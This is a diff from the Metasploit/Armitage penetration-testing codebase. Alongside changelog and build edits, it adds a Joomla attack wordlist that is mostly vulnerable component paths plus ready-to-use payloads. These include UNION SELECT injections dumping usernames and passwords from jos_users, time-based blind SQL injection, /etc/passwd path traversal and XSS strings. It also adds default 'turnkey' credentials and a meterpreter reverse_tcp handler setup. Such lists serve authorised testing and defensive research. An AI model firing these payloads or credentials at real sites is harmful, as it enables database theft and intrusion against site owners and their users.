+  not '127.0.0.1'.
+- Screenshots and Webcam shots are now centered in their tab.
+- Added an alternate .bat file to start msfrpcd on Windows in the
+  Metasploit 4.5 installer's environment.
+- Added a color-style for [!] warning messages
+
+Cortana Updates (for scripters)
+--------
+- &handler function now works as advertised.
+- Cortana now avoids use of core.setg
+
+4 Jan 13 (tested against msf 16252)
+--------
+- Added a helper to set REXE option
+- Added an icon to represent Windows 8
+- [host] -> Login menu is now built using open services for all 
+  highlighted hosts, not just the first one.
+- [host] -> Login items now escape punctuation characters in passwords
+  before passing them to a framework module.
+- Added the windows and linux postgres_payload exploits to the use a
+  reverse payload by default list.
+- Small tweak to allow Armitage to work with Metasploit 4.5 installed
+  environment on Windows.
+
+Cortana Updates (for scripters)
+--------
+- &credential_add and &credential_delete no longer break when a 
+  password has creative punctuation in it.
+
 26 Nov 12 (tested against msf 16114)
 ---------
 - Windows command shell tab is now friendlier to commands that prompt

data/wordlists/http_default_pass.txt

@@ -14,4 +14,5 @@ sys
 none
 xampp
 wampp
-ppmax2011 
+ppmax2011
+turnkey

data/wordlists/http_default_userpass.txt

@@ -7,3 +7,4 @@ private private
 wampp xampp
 newuser wampp
 xampp-dav-unsecure ppmax2011 
+admin turnkey

data/wordlists/joomla.txt

@@ -0,0 +1,627 @@
+&controller=../../../../../../../../../../../../[LFI]%00
+?1.5.10-x
+?1.5.11-x-http_ref
+?1.5.11-x-php-s3lf
+?1.5.3-path-disclose
+?1.5.3-spam
+?1.5.8-x
+?1.5.9-x
+?j1012-fixate-session
+?option=com_mysms&Itemid=0&task=phonebook
+Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png
+admin/
+administrator/
+administrator/components/
+administrator/components/com_a6mambocredits/
+administrator/components/com_a6mambohelpdesk/
+administrator/components/com_admin/admin.admin.html.php
+administrator/components/com_astatspro/refer.php
+administrator/components/com_bayesiannaivefilter/
+administrator/components/com_chronocontact/excelwriter/PPS/File.php
+administrator/components/com_colophon/
+administrator/components/com_colorlab/
+administrator/components/com_comprofiler/
+administrator/components/com_comprofiler/plugin.class.php
+administrator/components/com_cropimage/admin.cropcanvas.php
+administrator/components/com_extplorer/
+administrator/components/com_feederator/includes/tmsp/add_tmsp.php
+administrator/components/com_googlebase/
+administrator/components/com_installer
+administrator/components/com_jcs/
+administrator/components/com_jim/
+administrator/components/com_jjgallery/
+administrator/components/com_joom12pic/
+administrator/components/com_joomla-visites/
+administrator/components/com_joomla_flash_uploader/
+administrator/components/com_joomlaflashfun/
+administrator/components/com_joomlaradiov5/
+administrator/components/com_jpack/
+administrator/components/com_jreactions/
+administrator/components/com_juser/
+administrator/components/com_admin/
+administrator/components/com_kochsuite /
+administrator/components/com_linkdirectory/
+administrator/components/com_livechat/getSavedChatRooms.php
+administrator/components/com_livechat/xmlhttp.php
+administrator/components/com_lurm_constructor/admin.lurm_constructor.php
+administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php");
+administrator/components/com_mambelfish/
+administrator/components/com_mgm/
+administrator/components/com_mmp/help.mmp.php
+administrator/components/com_mosmedia/
+administrator/components/com_multibanners/extadminmenus.class.php
+administrator/components/com_panoramic/
+administrator/components/com_peoplebook/param.peoplebook.php
+administrator/components/com_phpshop/toolbar.phpshop.html.php
+administrator/components/com_remository/admin.remository.php
+administrator/components/com_serverstat/install.serverstat.php
+administrator/components/com_simpleswfupload/uploadhandler.php");
+administrator/components/com_swmenupro/
+administrator/components/com_treeg/
+administrator/components/com_uhp/
+administrator/components/com_uhp2/
+administrator/components/com_webring/
+administrator/components/com_wmtgallery/
+administrator/components/com_wmtportfolio/
+administrator/components/com_x-shop/
+administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
+administrator/index.php?option=com_searchlog&act=log
+ajaxim/
+akocomments.php
+cart?Itemid=[SQLi]
+component/com__brightweblinks/
+component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0
+component/osproperty/?task=agent_register
+component/quran/index.php?option=com_quran&action=viewayat&surano=
+components/com_ clickheat/
+components/com_5starhotels/
+components/com_Jambook/jambook.php
+components/com_a6mambocredits/
+components/com_a6mambohelpdesk/
+components/com_ab_gallery/
+components/com_acajoom/
+components/com_acctexp/
+components/com_aclassf/
+components/com_activities/
+components/com_actualite/
+components/com_admin/admin.admin.html.php
+components/com_advancedpoll/
+components/com_agora/
+components/com_agoragroup/
+components/com_ajaxchat/
+components/com_akobook/
+components/com_akocomment/
+components/com_akogallery
+components/com_alberghi/
+components/com_allhotels/
+components/com_alphacontent/
+components/com_altas/
+components/com_amocourse/
+components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php
+components/com_articles/
+components/com_artist/
+components/com_artlinks/
+components/com_asortyment/
+components/com_astatspro/
+components/com_awesom/
+components/com_babackup/
+components/com_banners/
+components/com_bayesiannaivefilter/
+components/com_be_it_easypartner/
+components/com_beamospetition/
+components/com_biblestudy/
+components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
+components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
+components/com_blog/
+components/com_bookflip/
+components/com_bookjoomlas/
+components/com_booklibrary/
+components/com_books/
+components/com_bsadv/
+components/com_bsq_sitestats/
+components/com_bsq_sitestats/external/rssfeed.php
+components/com_bsqsitestats/
+components/com_calendar/
+components/com_camelcitydb2/
+components/com_candle/
+components/com_casino_blackjack/
+components/com_casino_videopoker/
+components/com_casinobase/
+components/com_catalogproduction/
+components/com_catalogshop/
+components/com_category/
+components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>
+components/com_chronocontact/excelwriter/PPS/File.php
+components/com_cinema/
+components/com_clasifier/
+components/com_classifieds/
+components/com_clickheat/
+components/com_cloner/
+components/com_cmimarketplace/
+components/com_cms/
+components/com_colophon/
+components/com_colorlab/
+components/com_competitions/
+components/com_comprofiler/
+components/com_comprofiler/plugin.class.php
+components/com_contactinfo/
+components/com_content/
+components/com_cpg/cpg.php
+components/com_cropimage/admin.cropcanvas.php
+components/com_custompages/
+components/com_cx/
+components/com_d3000/
+components/com_dadamail/
+components/com_dailymessage/
+components/com_datsogallery/
+components/com_dbquery/
+components/com_detail/
+components/com_digistore/
+components/com_directory/
+components/com_djiceshoutbox/
+components/com_doc/
+components/com_downloads/
+components/com_ds-syndicate/
+components/com_dtregister/
+components/com_dv/externals/phpupload/upload.php");
+components/com_easybook/
+components/com_emcomposer/
+components/com_equotes/
+components/com_estateagent/
+components/com_eventing/
+components/com_eventlist/
+components/com_events/
+components/com_ewriting/
+components/com_expose/uploadimg.php
+components/com_expshop/
+components/com_extcalendar/
+components/com_extcalendar/cal_popup.php?extmode=view&extid=
+components/com_extcalendar/extcalendar.php
+components/com_extended_registration/registration_detailed.inc.php
+components/com_extplorer/
+components/com_ezine/
+components/com_ezstore/
+components/com_facileforms/
+components/com_fantasytournament/
+components/com_faq/
+components/com_feederator/includes/tmsp/add_tmsp.php
+components/com_filebase/
+components/com_filiale/
+components/com_flashfun/
+components/com_flashmagazinedeluxe/
+components/com_flippingbook/
+components/com_flyspray/startdown.php
+components/com_fm/fm.install.php
+components/com_foevpartners/
+components/com_football/
+components/com_formtool/
+components/com_forum/
+components/com_fq/
+components/com_fundraiser/
+components/com_galeria/
+components/com_galleria/galleria.html.php
+components/com_gallery/
+components/com_game/
+components/com_gameq/
+components/com_garyscookbook/
+components/com_genealogy/
+components/com_geoboerse/
+components/com_gigcal/
+components/com_gmaps/
+components/com_googlebase/
+components/com_gsticketsystem/
+components/com_guide/
+components/com_hashcash/server.php
+components/com_hbssearch/
+components/com_hello_world/
+components/com_hotproperties/
+components/com_hotproperty/
+components/com_hotspots/
+components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
+components/com_hwdvideoshare/
+components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1");
+components/com_ice/
+components/com_idoblog/
+components/com_idvnews/
+components/com_ignitegallery/
+components/com_ijoomla_archive/
+components/com_ijoomla_rss/
+components/com_inter/
+components/com_ionfiles/
+components/com_is/
+components/com_ixxocart/
+components/com_jabode/
+components/com_jashowcase/
+components/com_jb2/
+components/com_jce/
+components/com_jcs/
+components/com_jd-wiki/
+components/com_jd-wp/
+components/com_jim/
+components/com_jjgallery/
+components/com_jmovies/
+components/com_jobline/
+components/com_jombib/
+components/com_joobb/
+components/com_jooget/
+components/com_joom12pic/
+components/com_joomla-visites/
+components/com_joomla_flash_uploader/
+components/com_joomlaboard/
+components/com_joomladate/ 
+components/com_joomlaflashfun/
+components/com_joomlalib/
+components/com_joomlaradiov5/
+components/com_joomlavvz/
+components/com_joomlaxplorer/
+components/com_joomloads/
+components/com_joomradio/
+components/com_joomtracker/
+components/com_joovideo/
+components/com_jotloader/
+components/com_journal/
+components/com_jpack/
+components/com_jpad/
+components/com_jreactions/
+components/com_jreviews/scripts/xajax.inc.php
+components/com_jumi/
+components/com_juser/
+components/com_jvideo/
+components/com_k2/
+components/com_kbase/
+components/com_knowledgebase/fckeditor/fckeditor.js
+components/com_kochsuite /
+components/com_kunena/
+components/com_letterman/
+components/com_lexikon/
+components/com_linkdirectory/
+components/com_listoffreeads/
+components/com_livechat/getSavedChatRooms.php
+components/com_livechat/xmlhttp.php
+components/com_liveticker/
+components/com_lm/
+components/com_lmo/
+components/com_loudmounth/includes/abbc/abbc.class.php
+components/com_loudmouth/
+components/com_lowcosthotels/
+components/com_lurm_constructor/admin.lurm_constructor.php
+components/com_mad4joomla/
+components/com_madeira/img.php
+components/com_maianmusic/
+components/com_mailarchive/
+components/com_mailto/
+components/com_mambatstaff/mambatstaff.php
+components/com_mambelfish/
+components/com_mambospgm/
+components/com_mambowiki/MamboLogin.php
+components/com_marketplace/
+components/com_mcquiz/
+components/com_mdigg/
+components/com_media_library/
+components/com_mediaslide/
+components/com_mezun/
+components/com_mgm/
+components/com_minibb/
+components/com_misterestate/
+components/com_mmp/help.mmp.php
+components/com_model/
+components/com_moodle/moodle.php
+components/com_moofaq/
+components/com_mosmedia/
+components/com_mospray/scripts/admin.php
+components/com_mosres/
+components/com_most/
+components/com_mp3_allopass/
+components/com_mtree/
+components/com_mtree/img/listings/o/{id}.php
+components/com_multibanners/extadminmenus.class.php
+components/com_myalbum/
+components/com_mycontent/
+components/com_mydyngallery/
+components/com_mygallery/
+components/com_n-forms/
+components/com_na_content/
+components/com_na_mydocs/
+components/com_na_newsdescription/
+components/com_na_qforms/
+components/com_neogallery/
+components/com_neorecruit/
+components/com_neoreferences/
+components/com_netinvoice/
+components/com_news/
+components/com_news_portal/
+components/com_newsflash/
+components/com_nfn_addressbook/
+components/com_nicetalk/
+components/com_noticias/
+components/com_omnirealestate/
+components/com_omphotogallery/
+components/com_ongumatimesheet20/
+components/com_onlineflashquiz/
+components/com_ownbiblio/
+components/com_panoramic/
+components/com_paxgallery/
+components/com_paxxgallery/
+components/com_pcchess/
+components/com_pcchess/include.pcchess.php
+components/com_pccookbook/
+components/com_pccookbook/pccookbook.php
+components/com_peoplebook/param.peoplebook.php
+components/com_performs/
+components/com_philaform/
+components/com_phocadocumentation/
+components/com_php/
+components/com_phpshop/toolbar.phpshop.html.php
+components/com_pinboard/
+components/com_pms/
+components/com_poll/
+components/com_pollxt/
+components/com_ponygallery/
+components/com_portafolio/
+components/com_portfol/
+components/com_prayercenter/
+components/com_pro_desk/
+components/com_prod/
+components/com_productshowcase/
+components/com_profiler/
+components/com_projectfork/
+components/com_propertylab/
+components/com_puarcade/
+components/com_publication/
+components/com_quiz/
+components/com_rapidrecipe/
+components/com_rdautos/
+components/com_realestatemanager/
+components/com_recly/
+components/com_referenzen/
+components/com_rekry/
+components/com_remository/admin.remository.php
+components/com_remository_files/file_image_14/1276100016shell.php
+components/com_reporter/processor/reporter.sql.php
+components/com_resman/
+components/com_restaurante/
+components/com_ricette/
+components/com_rsfiles/
+components/com_rsgallery/
+components/com_rsgallery2/
+components/com_rss/
+components/com_rssreader/
+components/com_rssxt/
+components/com_rwcards/
+components/com_school/
+components/com_search/
+components/com_sebercart/getPic.php?p=[LFD]%00
+components/com_securityimages/
+components/com_sef/
+components/com_seminar/
+components/com_serverstat/install.serverstat.php
+components/com_sg/
+components/com_simple_review/
+components/com_simpleboard/
+components/com_simplefaq/
+components/com_simpleshop/
+components/com_sitemap/sitemap.xml.php
+components/com_slideshow/
+components/com_smf/
+components/com_smf/smf.php
+components/com_swmenupro/
+components/com_team/
+components/com_tech_article/
+components/com_thopper/
+components/com_thyme/
+components/com_tickets/
+components/com_tophotelmodule/
+components/com_tour_toto/
+components/com_trade/
+components/com_uhp/
+components/com_uhp2/
+components/com_user/controller.php
+components/com_users/
+components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php
+components/com_vehiclemanager/
+components/com_versioning /
+components/com_videodb/core/videodb.class.xml.php
+components/com_virtuemart/
+components/com_volunteer/
+components/com_vr/
+components/com_waticketsystem/
+components/com_webhosting/
+components/com_weblinks/
+components/com_webring/
+components/com_wmtgallery/
+components/com_wmtportfolio/
+components/com_x-shop/
+components/com_xevidmegahd/
+components/com_xewebtv/
+components/com_xfaq/
+components/com_xgallery/helpers/img.php?file=
+components/com_xsstream-dm/
+components/com_ynews/
+components/com_yvcomment/
+components/com_zoom/classes/
+components/mod_letterman/
+components/remository/
+eXtplorer/
+easyblog/entry/uncategorized
+extplorer/
+components/com_mtree/img/listings/o/{id}.php where {id}
+includes/joomla.php
+index.php/404'
+index.php/?option=com_question&catID=21' and+1=0 union all
+index.php/image-gallery/"><script>alert('xss')</script>/25-koala
+index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&amp;type=css&v=1
+index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view
+index.php?option=com_aardvertiser&cat_name=conf&task=<=
+index.php?option=com_aardvertiser&task=
+index.php?option=com_abc&view=abc&letter=AS&sectionid='
+index.php?option=com_advert&id=36'
+index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users--
+index.php?option=com_alfurqan15x&action=viewayat&surano=
+index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
+index.php?option=com_annonces&view=edit&Itemid=1
+index.php?option=com_articleman&task=new
+index.php?option=com_bbs&bid=-1
+index.php?option=com_beamospetition&startpage=3&pet=-
+index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users-
+index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27
+index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
+index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1
+index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users--
+index.php?option=com_chronoconnectivity&itemid=1
+index.php?option=com_chronocontact&itemid=1
+index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=
+index.php?option=com_clantools&squad=1+
+index.php?option=com_clantools&task=clanwar&showgame=1+
+index.php?option=com_commedia&format=raw&task=image&pid=4&id=964'
+index.php?option=com_commedia&task=page&commpid=21
+index.php?option=com_connect&view=connect&controller=
+index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../
+index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_dioneformwizard&controller=[LFI]%00
+index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1
+index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12
+index.php?option=com_easyfaq&Itemid=1&task=view&gid=
+index.php?option=com_easyfaq&catid=1&task=view&id=-2527+
+index.php?option=com_easyfaq&task=view&contact_id=
+index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=
+index.php?option=com_equipment&task=components&id=45&sec_men_id=
+index.php?option=com_equipment&view=details&id=
+index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli]
+index.php?option=com_etree&view=displays&layout=category&id=[SQL]
+index.php?option=com_etree&view=displays&layout=user&user_id=[SQL]
+index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1
+index.php?option=com_fabrik&view=table&tableid=13+union+select+1----
+index.php?option=com_filecabinet&task=download&cid[]=7
+index.php?option=com_firmy&task=section_show_set&Id=-1
+index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
+index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id=
+index.php?option=com_graphics&controller=
+index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search=
+index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp=
+index.php?option=com_huruhelpdesk&view=detail
+index.php?option=com_huruhelpdesk&view=detail&cid[0]=
+index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1
+index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 
+index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 
+index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1
+index.php?option=com_iproperty&view=agentproperties&id=
+index.php?option=com_jacomment&view=
+index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
+index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
+index.php?option=com_jcommunity&controller=members&task=1'
+index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13
+index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2
+index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2
+index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00
+index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL)))
+index.php?option=com_jfuploader&Itemid=
+index.php?option=com_jgen&task=view&id=
+index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
+index.php?option=com_jimtawl&Itemid=12&task=
+index.php?option=com_jmarket&controller=product&task=1'
+index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1'
+index.php?option=com_jomdirectory&task=search&type=111+
+index.php?option=com_joomdle&view=detail&cat_id=1&course_id=
+index.php?option=com_joomla_flash_uploader&Itemid=1
+index.php?option=com_joomleague&func=showNextMatch&p=[sqli]
+index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli]
+index.php?option=com_joomtouch&controller=
+index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00
+index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00
+index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users
+index.php?option=com_jstore&controller=product-display&task=1'
+index.php?option=com_jsubscription&controller=subscription&task=1'
+index.php?option=com_jtickets&controller=ticket&task=1'
+index.php?option=com_konsultasi&act=detail&sid=
+index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
+index.php?option=com_kunena&func=userlist&search=
+index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1'
+index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users--
+index.php?option=com_matamko&controller=
+index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm
+index.php?option=com_neorecruit&task=offer_view&id=
+index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
+index.php?option=com_noticeboard&controller=
+index.php?option=com_obsuggest&controller=
+index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
+index.php?option=com_ongallery&task=ft&id=-1+union+select+1--
+index.php?option=com_oziogallery&Itemid=
+index.php?option=com_page&id=53
+index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL)))
+index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00
+index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection]
+index.php?option=com_phocagallery&view=categories&Itemid=
+index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
+index.php?option=com_php&file=../../../../../../../../../../etc/passwd
+index.php?option=com_php&file=../images/phplogo.jpg
+index.php?option=com_php&file=../js/ie_pngfix.js
+index.php?option=com_ponygallery&Itemid=[sqli]
+index.php?option=com_products&catid=-1
+index.php?option=com_products&id=-1
+index.php?option=com_products&product_id=-1
+index.php?option=com_products&task=category&catid=-1
+index.php?option=com_properties&task=agentlisting&aid=
+index.php?option=com_qcontacts&Itemid=1'
+index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts
+index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_restaurantguide&view=country&id='&Itemid=69
+index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'
+index.php?option=com_seyret&view=
+index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--
+index.php?option=com_smartsite&controller=
+index.php?option=com_spa&view=spa_product&cid=
+index.php?option=com_spidercalendar
+index.php?option=com_spidercalendar&date=1'
+index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
+index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
+index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
+index.php?option=com_staticxt&staticfile=test.php&id=1923
+index.php?option=com_szallasok&mode=8&id=25 (SQL)
+index.php?option=com_tag&task=tag&tag=
+index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--
+index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users
+index.php?option=com_ultimateportfolio&controller=
+index.php?option=com_users&view=registration
+index.php?option=com_virtuemart&page=account.index&keyword=[sqli]
+index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_x-shop&action=artdetail&idd='
+index.php?option=com_x-shop&action=artdetail&idd='[SQLi]
+index.php?option=com_xcomp&controller=../../[LFI]%00
+index.php?option=com_xvs&controller=../../[LFI]%00
+index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users--
+index.php?option=com_yjcontactus&view=
+index.php?option=com_youtube&id_cate=4
+index.php?option=com_zina&view=zina&Itemid=9
+index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=
+index.php?search=NoGe&option=com_esearch&searchId=
+index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube
+index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users--
+js/index.php?option=com_socialads&view=showad&Itemid=94
+libraries/joomla/utilities/compat/php50x.php
+libraries/pcl/pcltar.php
+libraries/phpmailer/phpmailer.php
+libraries/phpxmlrpc/xmlrpcs.php
+modules/mod_artuploader/upload.php");
+modules/mod_as_category.php
+modules/mod_calendar.php
+modules/mod_ccnewsletter/helper/popup.php?id=[SQLi]
+modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream");
+modules/mod_jfancy/script.php");
+modules/mod_ppc_simple_spotlight/elements/upload_file.php
+modules/mod_ppc_simple_spotlight/img/
+modules/mod_pxt/
+modules/mod_quick_question.php
+modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0
+patch/makedown.php?arquivo=../../../../etc/passwd
+plugins/content/efup_files/helper.php");
+plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data">
+plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
+plugins/editors/xstandard/attachmentlibrary.php
+print.php?task=person&id=36 and 1=1
+templates/be2004-2/
+templates/ja_purity/
+wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
+web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'

data/wordlists/root_userpass.txt

@@ -48,3 +48,4 @@ root powerapp
 root dbps
 root ibm
 root monitor
+root turnkey

external/pcaprub/extconf.rb

@@ -9,7 +9,9 @@ puts "\n[*] Running checks for netifaces code added by metasploit project"
 puts "-----------------------------------------------------------------"
 #uncoment to force ioctl on non windows systems
 #@force_ioctl = true
-@supported_archs = ["i386-mingw32", "i486-linux", "universal-darwin10.0", "i386-openbsd4.8","i386-freebsd8","arm-linux-eabi"]
+@supported_archs = [ "i386-mingw32", "i486-linux", "x86_64-linux",
+	"universal-darwin10.0", "i386-openbsd4.8", "i386-freebsd8",
+	"arm-linux-eabi" ]
 #arm-linux-eabi tested on maemo5 / N900
 puts "[*] Warning : this platform as not been tested" unless @supported_archs.include? RUBY_PLATFORM
 

external/source/armitage/build.xml

@@ -16,6 +16,8 @@
 			depend="yes"
 			debug="true"
 			optimize="yes"
+			target="1.6"
+			source="1.6"
 			includeantruntime="fuckno"
 		>
 		       <classpath path="./lib/jgraphx.jar;./lib/sleep.jar;./lib/msgpack-0.5.1-devel.jar;./lib/postgresql-9.1-901.jdbc4.jar" />

external/source/armitage/readme.txt

@@ -60,7 +60,7 @@ sure you peruse the FAQ and Manual first.
 7. License
    -------
 
-(c) 2010-2012 Raphael Mudge. This project is licensed under the BSD license. 
+(c) 2010-2013 Raphael Mudge. This project is licensed under the BSD license. 
 See section 8 for more information.
 
 lib/jgraphx.jar is used here within the terms of the BSD license offered by

external/source/armitage/resources/about.html

@@ -1,9 +1,9 @@
 <html>
 	<body>	
-		<center><h1>Armitage 1.44</h1></center>
+		<center><h1>Armitage 1.45</h1></center>
 
 		<p>An attack management tool for Metasploit&reg;
-		<br />Release: 26 Nov 12</p>
+		<br />Release: 23 Jan 13</p>
 		<br />
 		<p>Developed by:</p>
 

external/source/armitage/resources/msfconsole.style

@@ -4,6 +4,7 @@
 ^msf  (.*?)\((.*?)\) >		\umsf\u  $1(\c4$2\o) >
 ^\[\*\] (.*)			\cC[*]\o $1
 ^\[\+\] (.*)			\c9[+]\o $1
+^\[\!\] (.*)			\c8[!]\o $1
 ^\[\-\] (.*)			\c4[-]\o $1
 ^       =\[ (.*)		       =[\c7 $1
 ^(=[=\s]+)			\cE$1

external/source/armitage/resources/msfrpcd_new.bat

@@ -0,0 +1,12 @@
+@echo off
+set BASE=$$BASE$$..\..\
+cd "%BASE%"
+set PATH=%BASE%ruby\bin;%BASE%java\bin;%BASE%tools;%BASE%nmap;%BASE%postgresql\bin;%PATH%
+IF NOT EXIST "%BASE%java" GOTO NO_JAVA
+set JAVA_HOME="%BASE%java"
+:NO_JAVA
+set MSF_DATABASE_CONFIG="%BASE%apps\pro\ui\config\database.yml"
+set MSF_BUNDLE_GEMS=0
+set BUNDLE_GEMFILE=%BASE%apps\pro\ui\Gemfile
+cd "%BASE%apps\pro\msf3"
+rubyw msfrpcd -a 127.0.0.1 -U $$USER$$ -P $$PASS$$ -S -f -p $$PORT$$

external/source/armitage/scripts-cortana/cortanadb.sl

@@ -42,8 +42,13 @@ sub c_client {
 sub setupHandlers {
 	find_job("Exploit: multi/handler", {
 		if ($1 == -1) {
+			# set LPORT for the user...
+			local('$c');
+			$c = call($client, "console.allocate")['id'];
+			call($client, "console.write", $c, "setg LPORT " . randomPort() . "\n");
+			call($client, "console.release", $c);
+
 			# setup a handler for meterpreter
-			call($client, "core.setg", "LPORT", randomPort());
 			call($client, "module.execute", "exploit", "multi/handler", %(
 				PAYLOAD => "windows/meterpreter/reverse_tcp",
 				LHOST => "0.0.0.0",
@@ -55,7 +60,7 @@ sub setupHandlers {
 
 sub main {
 	global('$client $mclient');
-	local('%r $exception');
+	local('%r $exception $lhost $temp $c');
 
 	setField(^msf.MeterpreterSession, DEFAULT_WAIT => 20000L);
 
@@ -81,8 +86,24 @@ sub main {
